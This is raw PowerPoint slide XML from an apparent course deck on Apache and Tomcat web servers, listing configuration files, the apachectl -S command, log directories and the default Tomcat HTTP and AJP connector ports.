              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache server control interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apachectl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ command ‘-S’ argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Apache Web Servers</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25" r="56506" b="30456"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259552" y="2945852"/>
            <a:ext cx="4832753" cy="3278498"/>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t="-1" r="7127" b="43900"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613910" y="1407324"/>
            <a:ext cx="7486650" cy="1538528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35168522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a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apachectl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial Narrow"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial Narrow"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial Narrow"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial Narrow"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Arial Narrow"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache Web Servers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Google Shape;528;p54"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="7428" b="18018"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762752" y="2440188"/>
            <a:ext cx="7393211" cy="370581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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752" y="2810769"/>
            <a:ext cx="10345390" cy="3351906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19451231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Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565666" y="1595441"/>
            <a:ext cx="11176000" cy="4795837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in: Binaries and startup scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Catalina.policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Security policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Main configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show how server is being utilized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jserv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Procotol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> connector to handle communication between Tomcat and Apache HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/opt/tomcat/logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:backgroundRemoval t="0" b="100000" l="454" r="100000">
                        <a14:backgroundMark x1="28593" y1="2695" x2="28593" y2="2695"/>
                        <a14:backgroundMark x1="24962" y1="1198" x2="24962" y2="1198"/>
                        <a14:backgroundMark x1="37670" y1="1198" x2="97126" y2="2096"/>
                        <a14:backgroundMark x1="98941" y1="5389" x2="99244" y2="96707"/>
                        <a14:backgroundMark x1="36309" y1="2096" x2="12405" y2="1198"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825942" y="1343025"/>
            <a:ext cx="6296904" cy="3181794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="986790" y="4518599"/>
            <a:ext cx="10218420" cy="417700"/>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sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8080” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1.1” connectionTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘20000” redirectPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8443” /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="986790" y="5752344"/>
            <a:ext cx="10218420" cy="417700"/>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sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8009” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“AJP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1.3” redirectPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8443” /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1924942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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in: Binaries and startup scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Catalina.policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Security policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier Std" panose="02070409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Server.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Main configuration file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connectors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Show how server is being utilized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jserv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Procotol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> connector to handle communication between Tomcat and Apache HTTP server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/opt/tomcat/logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tomcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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ackgroundRemoval t="0" b="100000" l="454" r="100000">
                        <a14:backgroundMark x1="28593" y1="2695" x2="28593" y2="2695"/>
                        <a14:backgroundMark x1="24962" y1="1198" x2="24962" y2="1198"/>
                        <a14:backgroundMark x1="37670" y1="1198" x2="97126" y2="2096"/>
                        <a14:backgroundMark x1="98941" y1="5389" x2="99244" y2="96707"/>
                        <a14:backgroundMark x1="36309" y1="2096" x2="12405" y2="1198"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825942" y="1343025"/>
            <a:ext cx="6296904" cy="3181794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="986790" y="4518599"/>
            <a:ext cx="10218420" cy="417700"/>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sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8080” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/1.1” connectionTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘20000” redirectPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“8443” /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="986790" y="5752344"/>
            <a:ext cx="10218420" cy="417700"/>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sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
